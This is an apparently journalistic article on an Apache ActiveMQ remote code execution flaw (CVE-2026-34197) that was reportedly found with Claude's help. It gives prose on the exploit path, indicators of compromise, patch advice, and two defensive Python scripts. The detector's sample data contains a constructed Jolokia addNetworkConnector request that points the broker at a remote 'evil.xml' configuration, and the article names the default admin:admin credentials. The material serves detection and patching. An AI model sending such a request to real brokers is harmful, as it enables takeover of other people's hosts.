How Anthropic’s Claude AI Uncovered a Hidden Apache ActiveMQ Vulnerability After 13 Years
For more than a decade, a critical security flaw lurked undetected within Apache ActiveMQ Classic, a widely used open-source message broker. The bug, recently identified as CVE-2026-34197, was finally exposed with the help of Anthropic’s AI assistant, Claude. This discovery highlights the growing role of artificial intelligence in cybersecurity and vulnerability research.
The flaw, categorized as a remote code execution (RCE) vulnerability, allows attackers to execute arbitrary operating system commands on affected systems. Horizon3.ai chief architect Naveen Sunkavally detailed the discovery in an April 7 blog post, emphasizing that organizations running ActiveMQ should prioritize patching immediately.
According to Sunkavally, “An attacker can invoke a management operation through ActiveMQ’s Jolokia API to trick the broker into fetching a remote configuration file and running arbitrary OS commands.” The vulnerability requires valid broker credentials, but the default admin:admin pair is still common in many environments. On versions 6.0.0 through 6.1.1 no credentials are needed at all, because a separate issue, CVE-2024-32114, exposes the Jolokia API without authentication; on those versions CVE-2026-34197 is an unauthenticated RCE.
Understanding the Apache ActiveMQ Bug and Its Impact
This Apache ActiveMQ bug stayed hidden for 13 years because it spans several components that were developed independently over time. Each feature looked safe in isolation; chained together, they form a dangerous exploit path. Sunkavally noted that this is exactly where Claude excelled: it stitched the attack path together end to end efficiently and without the assumptions a human reviewer brings to the code.
“Something that would have probably taken me a week manually took Claude 10 minutes,” he said. The AI’s ability to analyze source code and identify complex interactions between components made it an invaluable tool in this discovery.
How the Vulnerability Works
The exploit goes through ActiveMQ’s Jolokia API, the HTTP/JSON bridge to the broker’s JMX MBeans that the web console uses for management. A crafted POST to /api/jolokia/ invoking the broker’s addNetworkConnector operation hands the broker a network connector URI of the attacker’s choosing. A vm:// URI whose brokerConfig parameter points at an xbean: configuration served over HTTP makes the broker fetch that remote configuration file and load it; the attacker-controlled configuration then leads to arbitrary OS commands running in the broker process, giving the attacker control of the host.
Organizations concerned about potential compromise should check ActiveMQ broker logs for network connector activity referencing vm:// URIs with brokerConfig=xbean:http. Additional indicators of compromise include:
- POST requests to /api/jolokia/ containing addNetworkConnector in the request body
- Outbound HTTP requests from the ActiveMQ broker process to unexpected hosts
- Unexpected child processes spawned by the ActiveMQ Java process
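The first two indicators above can be checked mechanically. The script below is an added example, not Horizon3.ai’s code and not part of ActiveMQ: it flags POSTs to /api/jolokia/ that name addNetworkConnector and any vm:// URI whose brokerConfig parameter loads an xbean: configuration over HTTP, while leaving a broker-local config such as brokerConfig=xbean:activemq.xml alone. The request records, broker log lines and the 203.0.113.10 address are constructed for the example; real output depends on the Jetty request-log and log4j layout in use.

```python
"""Scan constructed request and broker-log records for the indicators listed above.

Added example; it is not Horizon3.ai's code nor part of ActiveMQ. The request
records and broker log lines are constructed for the example. Real ActiveMQ
output depends on the Jetty request-log and log4j layout in use, so adapt the
record shapes to what your broker actually writes.
"""
import re
from urllib.parse import parse_qs, urlsplit

JOLOKIA_PREFIX = "/api/jolokia"
OPERATION = "addNetworkConnector"
VM_URI = re.compile(r"vm://[^\s'\"<>]+")


def is_jolokia_add_connector(method, path, body):
    """Indicator 1: a POST to /api/jolokia/ whose body names addNetworkConnector."""
    return (method.upper() == "POST"
            and path.startswith(JOLOKIA_PREFIX)
            and OPERATION in body)


def remote_xbean_vm_uri(text):
    """Indicator 2: a vm:// URI whose brokerConfig loads an xbean: config over HTTP(S).

    Returns the first offending URI or None. A broker-local file such as
    brokerConfig=xbean:activemq.xml is normal and is not flagged.
    """
    for match in VM_URI.finditer(text):
        uri = match.group(0)
        params = parse_qs(urlsplit(uri).query)  # urlsplit copes with the vm scheme
        for cfg in params.get("brokerConfig", []):
            if cfg.lower().startswith("xbean:http"):
                return uri
    return None


def scan(requests, broker_log):
    """Return (source, indicator, detail) for every hit across both sources."""
    hits = []
    for method, path, body in requests:
        if is_jolokia_add_connector(method, path, body):
            hits.append(("request-log", "jolokia addNetworkConnector", f"{method} {path}"))
        uri = remote_xbean_vm_uri(body)
        if uri:
            hits.append(("request-log", "remote xbean brokerConfig", uri))
    for line in broker_log:
        uri = remote_xbean_vm_uri(line)
        if uri:
            hits.append(("broker-log", "remote xbean brokerConfig", uri))
    return hits


# Constructed samples (method, path, body); 203.0.113.10 is a documentation address.
SAMPLE_REQUESTS = [
    ("GET", "/admin/index.jsp", ""),
    ("POST", "/api/jolokia/",
     '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
     '"attribute":"TotalMessageCount"}'),
    ("POST", "/api/jolokia/",
     '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
     '"operation":"addNetworkConnector",'
     '"arguments":["vm://x?brokerConfig=xbean:http://203.0.113.10/evil.xml"]}'),
]

# Constructed broker log lines; the layout only loosely follows ActiveMQ's default pattern.
SAMPLE_BROKER_LOG = [
    "2026-04-08 10:01:02,114 | INFO  | Apache ActiveMQ 5.18.3 (localhost) is starting "
    "| org.apache.activemq.broker.BrokerService | main",
    "2026-04-08 10:01:03,501 | INFO  | Connector vm://localhost?brokerConfig=xbean:activemq.xml "
    "started | org.apache.activemq.broker.TransportConnector | main",
    "2026-04-08 10:07:41,002 | INFO  | Establishing network connection from "
    "vm://localhost?async=false&network=true to "
    "vm://x?brokerConfig=xbean:http://203.0.113.10/evil.xml "
    "| org.apache.activemq.network.DiscoveryNetworkConnector | ActiveMQ Task-3",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS, SAMPLE_BROKER_LOG):
        print(*hit, sep="  ")
```

Run against the constructed samples it reports three hits: the exec request (once for the operation name, once for the remote xbean URI in its body) and the broker log line that establishes the connection. The brokerConfig check is done on the parsed query string rather than by grepping for the literal text, so URL-encoded or reordered parameters are still caught and a local xbean: file is not.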
Patches and Mitigation Steps for the ActiveMQ RCE Vulnerability
The ActiveMQ RCE vulnerability is patched in ActiveMQ Classic 5.19.4 and 6.2.3; update to one of those releases as soon as possible. Also make sure no default credentials are in use: replacing the default admin:admin pair is a critical step, since many environments still rely on it. Note that on 6.0.0 through 6.1.1 a credential change does not help by itself, because the Jolokia API is reachable without authentication there (CVE-2024-32114).
For organizations that cannot patch immediately, network segmentation and restricting access to the Jolokia API, ideally so that only administrative hosts can reach the web console and /api/jolokia/ at all, reduce the exposure. Monitoring for the indicators of compromise listed above is also essential for early detection.
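To turn the patch guidance into a prioritized list across a fleet, the script below is an added example, not Horizon3.ai’s code and not part of ActiveMQ. It assumes, which the article does not state, that every 5.x release below 5.19.4 and every 6.x release below 6.2.3 is unpatched for CVE-2026-34197 (those being the fixed versions named above), takes the 6.0.0 through 6.1.1 range for the unauthenticated Jolokia exposure (CVE-2024-32114) from the text, and uses a constructed inventory of broker hosts and console credentials.

```python
"""Triage an inventory of ActiveMQ Classic brokers against the fixed versions above.

Added example; not Horizon3.ai's code and not part of ActiveMQ. Assumptions
the page does not state: every 5.x release below 5.19.4 and every 6.x release
below 6.2.3 is treated as unpatched for CVE-2026-34197 (those are the fixed
versions given above); the 6.0.0-6.1.1 range for the unauthenticated Jolokia
exposure (CVE-2024-32114) is taken from the page. The inventory is constructed.
"""
from typing import NamedTuple

FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}          # first patched release per major line
UNAUTH_JOLOKIA = ((6, 0, 0), (6, 1, 1))        # inclusive range, CVE-2024-32114
DEFAULT_CREDS = {("admin", "admin")}


class Finding(NamedTuple):
    host: str
    version: str
    status: str            # patched | rce-authenticated | rce-unauthenticated | unknown
    default_creds: bool
    actions: tuple


def parse_version(text):
    """'5.18.3' -> (5, 18, 3); pads short versions and drops a '-SNAPSHOT' style suffix."""
    nums = [int(p) for p in text.split("-")[0].split(".")[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def classify(version):
    """Map a version string to its exposure class for CVE-2026-34197."""
    v = parse_version(version)
    fixed = FIXED.get(v[0])
    if fixed is None:
        return "unknown"          # not a 5.x/6.x line; outside what the page covers
    if v >= fixed:
        return "patched"
    if UNAUTH_JOLOKIA[0] <= v <= UNAUTH_JOLOKIA[1]:
        return "rce-unauthenticated"
    return "rce-authenticated"


def triage(host, version, user, password):
    """Combine version exposure and credential hygiene into a Finding with actions."""
    status = classify(version)
    default = (user, password) in DEFAULT_CREDS
    actions = []
    if status.startswith("rce"):
        target = ".".join(map(str, FIXED[parse_version(version)[0]]))
        actions.append(f"upgrade to {target}")
        actions.append("restrict network access to /api/jolokia/ until patched")
    if status == "rce-unauthenticated":
        actions.append("treat as unauthenticated RCE: isolate now, hunt for indicators")
    if default:
        actions.append("replace default admin:admin credentials")
    if status == "unknown":
        actions.append("version line not covered here; check the vendor advisory")
    return Finding(host, version, status, default, tuple(actions))


# Constructed inventory: (host, version, console user, console password)
SAMPLE_INVENTORY = [
    ("mq-legacy-01", "5.18.3", "admin", "admin"),
    ("mq-app-02", "6.1.1", "ops", "s3cret-rotated"),
    ("mq-app-03", "6.2.3", "ops", "s3cret-rotated"),
    ("mq-app-04", "5.19.4", "admin", "admin"),
]

if __name__ == "__main__":
    for record in SAMPLE_INVENTORY:
        f = triage(*record)
        print(f"{f.host:14} {f.version:8} {f.status:20} default_creds={f.default_creds}")
        for a in f.actions:
            print("   -", a)
```

The point of keeping version and credential checks separate is visible in the sample: mq-app-02 on 6.1.1 has rotated credentials and is still the most urgent host, while mq-app-04 is patched but still needs its admin:admin pair replaced.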
If you are using ActiveMQ, review your configuration and apply the latest updates. For more on securing message brokers, check out our guide on best practices for message broker security.
Claude AI: A New Tool for Vulnerability Hunting
Sunkavally described the discovery of CVE-2026-34197 as “80% Claude and 20% gift-wrapping by a human.” He regularly uses Claude to take a first pass at source code for vulnerability hunting, prompting it lightly and setting up a target on the network for it to validate findings.
“A lot of the time, Claude finds interesting stuff but it doesn’t quite rise to the level of a CVE I’d bother reporting. In this case, it did a great job, with nothing more than a couple of basic prompts,” he said.
This case demonstrates how AI can accelerate vulnerability research, especially for bugs that involve complex interactions across multiple components. Sunkavally urged appsec engineers and developers to adopt tools like Claude in their workflows, stating that “anyone with a security background can take advantage.”
As AI continues to evolve, its role in cybersecurity will likely expand. For more insights on AI-driven security research, explore our article on how artificial intelligence is transforming threat detection.
Final Thoughts on the 13-Year-Old Bug
The discovery of this Apache ActiveMQ bug serves as a stark reminder that vulnerabilities can remain hidden for years, especially when they involve multiple independent components. The use of AI tools like Claude can help uncover these hidden threats more efficiently than traditional manual methods.
Organizations running ActiveMQ should act quickly to patch and review their security posture. By combining AI-powered vulnerability hunting with robust security practices, the cybersecurity community can stay ahead of evolving threats. For more on securing open-source software, see our tips for open-source security.